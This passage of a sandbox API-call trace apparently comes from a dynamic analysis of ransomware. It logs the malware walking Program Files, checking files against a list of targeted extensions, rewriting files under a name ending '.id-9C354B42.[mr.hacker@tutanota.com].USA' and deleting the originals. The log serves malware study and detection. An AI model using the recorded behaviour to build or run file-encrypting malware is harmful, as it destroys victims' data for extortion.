Shared\\THEMES14\\LEVEL\\LEVEL.INF") returned 71 [0265.023] lstrlenW (lpString=".1cd") returned 4 [0265.023] lstrcmpiW (lpString1=".1cd", lpString2=".INF") returned -1 [0265.023] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\LEVEL.INF") returned 71 [0265.023] lstrlenW (lpString=".jpg") returned 4 [0265.023] lstrcmpiW (lpString1=".jpg", lpString2=".INF") returned 1 [0265.023] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\LEVEL.INF") returned 71 [0265.023] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\LEVEL.INF") returned 71 [0265.023] lstrlenW (lpString=".doc") returned 4 [0265.023] lstrcmpiW (lpString1=".doc", lpString2=".INF") returned -1 [0265.023] lstrlenW (lpString=".docx") returned 5 [0265.023] lstrcmpiW (lpString1=".docx", lpString2="L.INF") returned -1 [0265.023] lstrlenW (lpString=".pdf") returned 4 [0265.023] lstrcmpiW (lpString1=".pdf", lpString2=".INF") returned 1 [0265.023] lstrlenW (lpString=".xls") returned 4 [0265.024] lstrcmpiW (lpString1=".xls", lpString2=".INF") returned 1 [0265.024] lstrlenW (lpString=".xlsx") returned 5 [0265.024] lstrcmpiW (lpString1=".xlsx", lpString2="L.INF") returned -1 [0265.024] lstrlenW (lpString=".ppt") returned 4 [0265.024] lstrcmpiW (lpString1=".ppt", lpString2=".INF") returned 1 [0265.024] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\LEVEL.INF") returned 71 [0265.024] lstrlenW (lpString=".zip") returned 4 [0265.024] lstrcmpiW (lpString1=".zip", lpString2=".INF") returned 1 [0265.024] lstrlenW (lpString=".rar") returned 4 [0265.024] lstrcmpiW (lpString1=".rar", lpString2=".INF") returned 1 [0265.024] lstrlenW (lpString=".bz2") returned 4 [0265.024] lstrcmpiW (lpString1=".bz2", lpString2=".INF") returned -1 [0265.024] lstrlenW (lpString=".7z") returned 3 [0265.024] lstrcmpiW (lpString1=".7z", lpString2="INF") returned -1 [0265.024] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\LEVEL.INF") returned 71 [0265.024] lstrlenW (lpString=".dbf") returned 4 [0265.024] lstrcmpiW (lpString1=".dbf", lpString2=".INF") returned -1 [0265.024] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\LEVEL.INF") returned 71 [0265.024] lstrlenW (lpString=".1cd") returned 4 [0265.024] lstrcmpiW (lpString1=".1cd", lpString2=".INF") returned -1 [0265.024] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\LEVEL.INF") returned 71 [0265.024] lstrlenW (lpString=".jpg") returned 4 [0265.024] lstrcmpiW (lpString1=".jpg", lpString2=".INF") returned 1 [0265.024] lstrcmpiW (lpString1=".ELM", lpString2=".USA") returned -1 [0265.024] lstrlenW (lpString="NETWORK.ELM") returned 11 [0265.024] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\NETWORK.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\network.elm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0265.025] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x380ff1c | out: lpFileSize=0x380ff1c*=50761) returned 1 [0265.025] CloseHandle (hObject=0x380) returned 1 [0265.025] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\NETWORK.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\network.elm")) returned 0x20 [0265.026] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\NETWORK.ELM.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\network.elm.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0265.026] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\NETWORK.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\network.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0265.026] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\NETWORK.ELM") returned 75 [0265.026] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\NETWORK.ELM") returned 75 [0265.026] lstrlenW (lpString=".doc") returned 4 [0265.026] lstrcmpiW (lpString1=".doc", lpString2=".ELM") returned -1 [0265.026] lstrlenW (lpString=".docx") returned 5 [0265.026] lstrcmpiW (lpString1=".docx", lpString2="K.ELM") returned -1 [0265.026] lstrlenW (lpString=".pdf") returned 4 [0265.026] lstrcmpiW (lpString1=".pdf", lpString2=".ELM") returned 1 [0265.026] lstrlenW (lpString=".xls") returned 4 [0265.026] lstrcmpiW (lpString1=".xls", lpString2=".ELM") returned 1 [0265.026] lstrlenW (lpString=".xlsx") returned 5 [0265.026] lstrcmpiW (lpString1=".xlsx", lpString2="K.ELM") returned -1 [0265.026] lstrlenW (lpString=".ppt") returned 4 [0265.026] lstrcmpiW (lpString1=".ppt", lpString2=".ELM") returned 1 [0265.026] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\NETWORK.ELM") returned 75 [0265.026] lstrlenW (lpString=".zip") returned 4 [0265.026] lstrcmpiW (lpString1=".zip", lpString2=".ELM") returned 1 [0265.026] lstrlenW (lpString=".rar") returned 4 [0265.026] lstrcmpiW (lpString1=".rar", lpString2=".ELM") returned 1 [0265.026] lstrlenW (lpString=".bz2") returned 4 [0265.026] lstrcmpiW (lpString1=".bz2", lpString2=".ELM") returned -1 [0265.026] lstrlenW (lpString=".7z") returned 3 [0265.026] lstrcmpiW (lpString1=".7z", lpString2="ELM") returned -1 [0265.026] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\NETWORK.ELM") returned 75 [0265.027] lstrlenW (lpString=".dbf") returned 4 [0265.027] lstrcmpiW (lpString1=".dbf", lpString2=".ELM") returned -1 [0265.027] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\NETWORK.ELM") returned 75 [0265.027] lstrlenW (lpString=".1cd") returned 4 [0265.027] lstrcmpiW (lpString1=".1cd", lpString2=".ELM") returned -1 [0265.027] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\NETWORK.ELM") returned 75 [0265.027] lstrlenW (lpString=".jpg") returned 4 [0265.027] lstrcmpiW (lpString1=".jpg", lpString2=".ELM") returned 1 [0265.027] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\NETWORK.ELM") returned 75 [0265.027] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\NETWORK.ELM") returned 75 [0265.027] lstrlenW (lpString=".doc") returned 4 [0265.027] lstrcmpiW (lpString1=".doc", lpString2=".ELM") returned -1 [0265.027] lstrlenW (lpString=".docx") returned 5 [0265.027] lstrcmpiW (lpString1=".docx", lpString2="K.ELM") returned -1 [0265.027] lstrlenW (lpString=".pdf") returned 4 [0265.027] lstrcmpiW (lpString1=".pdf", lpString2=".ELM") returned 1 [0265.027] lstrlenW (lpString=".xls") returned 4 [0265.027] lstrcmpiW (lpString1=".xls", lpString2=".ELM") returned 1 [0265.027] lstrlenW (lpString=".xlsx") returned 5 [0265.027] lstrcmpiW (lpString1=".xlsx", lpString2="K.ELM") returned -1 [0265.027] lstrlenW (lpString=".ppt") returned 4 [0265.027] lstrcmpiW (lpString1=".ppt", lpString2=".ELM") returned 1 [0265.027] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\NETWORK.ELM") returned 75 [0265.027] lstrlenW (lpString=".zip") returned 4 [0265.028] lstrcmpiW (lpString1=".zip", lpString2=".ELM") returned 1 [0265.028] lstrlenW (lpString=".rar") returned 4 [0265.028] lstrcmpiW (lpString1=".rar", lpString2=".ELM") returned 1 [0265.028] lstrlenW (lpString=".bz2") returned 4 [0265.028] lstrcmpiW (lpString1=".bz2", lpString2=".ELM") returned -1 [0265.028] lstrlenW (lpString=".7z") returned 3 [0265.028] lstrcmpiW (lpString1=".7z", lpString2="ELM") returned -1 [0265.028] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\NETWORK.ELM") returned 75 [0265.028] lstrlenW (lpString=".dbf") returned 4 [0265.028] lstrcmpiW (lpString1=".dbf", lpString2=".ELM") returned -1 [0265.028] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\NETWORK.ELM") returned 75 [0265.028] lstrlenW (lpString=".1cd") returned 4 [0265.028] lstrcmpiW (lpString1=".1cd", lpString2=".ELM") returned -1 [0265.028] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\NETWORK.ELM") returned 75 [0265.028] lstrlenW (lpString=".jpg") returned 4 [0265.028] lstrcmpiW (lpString1=".jpg", lpString2=".ELM") returned 1 [0265.028] lstrcmpiW (lpString1=".INF", lpString2=".USA") returned -1 [0265.028] lstrlenW (lpString="NETWORK.INF") returned 11 [0265.028] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\NETWORK.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\network.inf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0265.029] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x380ff1c | out: lpFileSize=0x380ff1c*=585) returned 1 [0265.029] CloseHandle (hObject=0x380) returned 1 [0265.029] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\NETWORK.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\network.inf")) returned 0x20 [0265.029] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\NETWORK.INF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\network.inf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0265.029] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\NETWORK.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\network.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0265.029] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\NETWORK.INF") returned 75 [0265.030] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\NETWORK.INF") returned 75 [0265.030] lstrlenW (lpString=".doc") returned 4 [0265.030] lstrcmpiW (lpString1=".doc", lpString2=".INF") returned -1 [0265.030] lstrlenW (lpString=".docx") returned 5 [0265.030] lstrcmpiW (lpString1=".docx", lpString2="K.INF") returned -1 [0265.030] lstrlenW (lpString=".pdf") returned 4 [0265.030] lstrcmpiW (lpString1=".pdf", lpString2=".INF") returned 1 [0265.030] lstrlenW (lpString=".xls") returned 4 [0265.030] lstrcmpiW (lpString1=".xls", lpString2=".INF") returned 1 [0265.030] lstrlenW (lpString=".xlsx") returned 5 [0265.030] lstrcmpiW (lpString1=".xlsx", lpString2="K.INF") returned -1 [0265.030] lstrlenW (lpString=".ppt") returned 4 [0265.030] lstrcmpiW (lpString1=".ppt", lpString2=".INF") returned 1 [0265.030] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\NETWORK.INF") returned 75 [0265.030] lstrlenW (lpString=".zip") returned 4 [0265.030] lstrcmpiW (lpString1=".zip", lpString2=".INF") returned 1 [0265.030] lstrlenW (lpString=".rar") returned 4 [0265.030] lstrcmpiW (lpString1=".rar", lpString2=".INF") returned 1 [0265.030] lstrlenW (lpString=".bz2") returned 4 [0265.030] lstrcmpiW (lpString1=".bz2", lpString2=".INF") returned -1 [0265.030] lstrlenW (lpString=".7z") returned 3 [0265.030] lstrcmpiW (lpString1=".7z", lpString2="INF") returned -1 [0265.030] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\NETWORK.INF") returned 75 [0265.030] lstrlenW (lpString=".dbf") returned 4 [0265.030] lstrcmpiW (lpString1=".dbf", lpString2=".INF") returned -1 [0265.175] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ARFR\\MSB1ARFR.ITS" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\arfr\\msb1arfr.its"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ARFR\\MSB1ARFR.ITS.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\arfr\\msb1arfr.its.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0 [0265.178] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1AR.LEX" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\msb1ar.lex"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1AR.LEX.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\msb1ar.lex.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0 [0265.182] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\VBE7.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\vbe7.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\VBE7.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\vbe7.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0 [0265.200] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\FPSRVUTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\web server extensions\\14\\bin\\fpsrvutl.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\FPSRVUTL.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\web server extensions\\14\\bin\\fpsrvutl.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0 [0265.307] lstrcmpiW (lpString1=".tlb", lpString2=".USA") returned -1 [0265.307] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msado20.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado20.tlb"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0265.336] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x380ff1c | out: lpFileSize=0x380ff1c*=69632) returned 1 [0265.336] CloseHandle (hObject=0x380) returned 1 [0265.336] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msado20.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado20.tlb")) returned 0x20 [0265.336] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msado20.tlb.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\system\\ado\\msado20.tlb.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0265.336] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msado20.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado20.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0267.072] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CMNTY_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cmnty_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a8 [0267.072] SetFilePointerEx (in: hFile=0x2a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0267.072] SetFilePointerEx (in: hFile=0x2a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0267.072] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CMNTY_01.MID.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cmnty_01.mid.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0267.073] GetLastError () returned 0x0 [0267.073] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x380fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x380fed4*=0x1b3a, lpOverlapped=0x0) returned 1 [0267.090] WriteFile (in: hFile=0x348, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0x1b40, lpNumberOfBytesWritten=0x380fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x380fc9c*=0x1b40, lpOverlapped=0x0) returned 1 [0267.091] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x380fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x380fed4*=0x0, lpOverlapped=0x0) returned 1 [0267.091] WriteFile (in: hFile=0x348, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x380fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x380fc9c*=0xec, lpOverlapped=0x0) returned 1 [0267.091] SetEndOfFile (hFile=0x348) returned 1 [0267.091] CloseHandle (hObject=0x348) returned 1 [0267.091] SetFilePointerEx (in: hFile=0x2a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0267.091] SetEndOfFile (hFile=0x2a8) returned 1 [0267.093] CloseHandle (hObject=0x2a8) returned 1 [0267.093] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CMNTY_01.MID.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0267.093] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CMNTY_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cmnty_01.mid")) returned 1 [0267.093] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CMNTY_01.MID") returned 63 [0267.093] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CMNTY_01.MID") returned 63 [0267.093] lstrlenW (lpString=".doc") returned 4 [0267.093] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0267.093] lstrlenW (lpString=".docx") returned 5 [0267.093] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0267.093] lstrlenW (lpString=".pdf") returned 4 [0267.093] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0267.093] lstrlenW (lpString=".xls") returned 4 [0267.093] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0267.093] lstrlenW (lpString=".xlsx") returned 5 [0267.094] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0267.094] lstrlenW (lpString=".ppt") returned 4 [0267.094] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0267.094] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CMNTY_01.MID") returned 63 [0267.094] lstrlenW (lpString=".zip") returned 4 [0267.094] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0267.094] lstrlenW (lpString=".rar") returned 4 [0267.094] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0267.094] lstrlenW (lpString=".bz2") returned 4 [0267.094] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0267.094] lstrlenW (lpString=".7z") returned 3 [0267.094] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0267.094] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CMNTY_01.MID") returned 63 [0267.094] lstrlenW (lpString=".dbf") returned 4 [0267.094] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0267.094] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CMNTY_01.MID") returned 63 [0267.094] lstrlenW (lpString=".1cd") returned 4 [0267.094] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0267.094] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CMNTY_01.MID") returned 63 [0267.094] lstrlenW (lpString=".jpg") returned 4 [0267.094] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0267.094] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CMNTY_01.MID") returned 63 [0267.094] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CMNTY_01.MID") returned 63 [0267.094] lstrlenW (lpString=".doc") returned 4 [0267.094] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0267.094] lstrlenW (lpString=".docx") returned 5 [0267.094] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0267.094] lstrlenW (lpString=".pdf") returned 4 [0267.094] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0267.095] lstrlenW (lpString=".xls") returned 4 [0267.095] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0267.095] lstrlenW (lpString=".xlsx") returned 5 [0267.095] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0267.095] lstrlenW (lpString=".ppt") returned 4 [0267.095] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0267.095] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CMNTY_01.MID") returned 63 [0267.095] lstrlenW (lpString=".zip") returned 4 [0267.095] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0267.095] lstrlenW (lpString=".rar") returned 4 [0267.095] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0267.095] lstrlenW (lpString=".bz2") returned 4 [0267.095] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0267.095] lstrlenW (lpString=".7z") returned 3 [0267.095] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0267.095] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CMNTY_01.MID") returned 63 [0267.095] lstrlenW (lpString=".dbf") returned 4 [0267.095] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0267.095] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CMNTY_01.MID") returned 63 [0267.095] lstrlenW (lpString=".1cd") returned 4 [0267.095] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0267.095] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CMNTY_01.MID") returned 63 [0267.095] lstrlenW (lpString=".jpg") returned 4 [0267.095] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0267.096] lstrcmpiW (lpString1=".MID", lpString2=".USA") returned -1 [0267.096] lstrlenW (lpString="FALL_01.MID") returned 11 [0267.096] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FALL_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fall_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a8 [0267.097] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x380ff1c | out: lpFileSize=0x380ff1c*=4846) returned 1 [0267.097] CloseHandle (hObject=0x2a8) returned 1 [0267.097] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FALL_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fall_01.mid")) returned 0x20 [0267.097] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FALL_01.MID.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fall_01.mid.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0267.097] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FALL_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fall_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a8 [0267.097] SetFilePointerEx (in: hFile=0x2a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0267.097] SetFilePointerEx (in: hFile=0x2a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0267.097] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FALL_01.MID.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fall_01.mid.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0267.098] GetLastError () returned 0x0 [0267.098] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x380fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x380fed4*=0x12ee, lpOverlapped=0x0) returned 1 [0267.099] WriteFile (in: hFile=0x348, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0x12f0, lpNumberOfBytesWritten=0x380fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x380fc9c*=0x12f0, lpOverlapped=0x0) returned 1 [0267.100] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x380fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x380fed4*=0x0, lpOverlapped=0x0) returned 1 [0267.100] WriteFile (in: hFile=0x348, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x380fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x380fc9c*=0xea, lpOverlapped=0x0) returned 1 [0267.100] SetEndOfFile (hFile=0x348) returned 1 [0267.100] CloseHandle (hObject=0x348) returned 1 [0267.100] SetFilePointerEx (in: hFile=0x2a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0267.100] SetEndOfFile (hFile=0x2a8) returned 1 [0267.102] CloseHandle (hObject=0x2a8) returned 1 [0267.102] SetFileAttributesW (lpFileName="C:\\Program 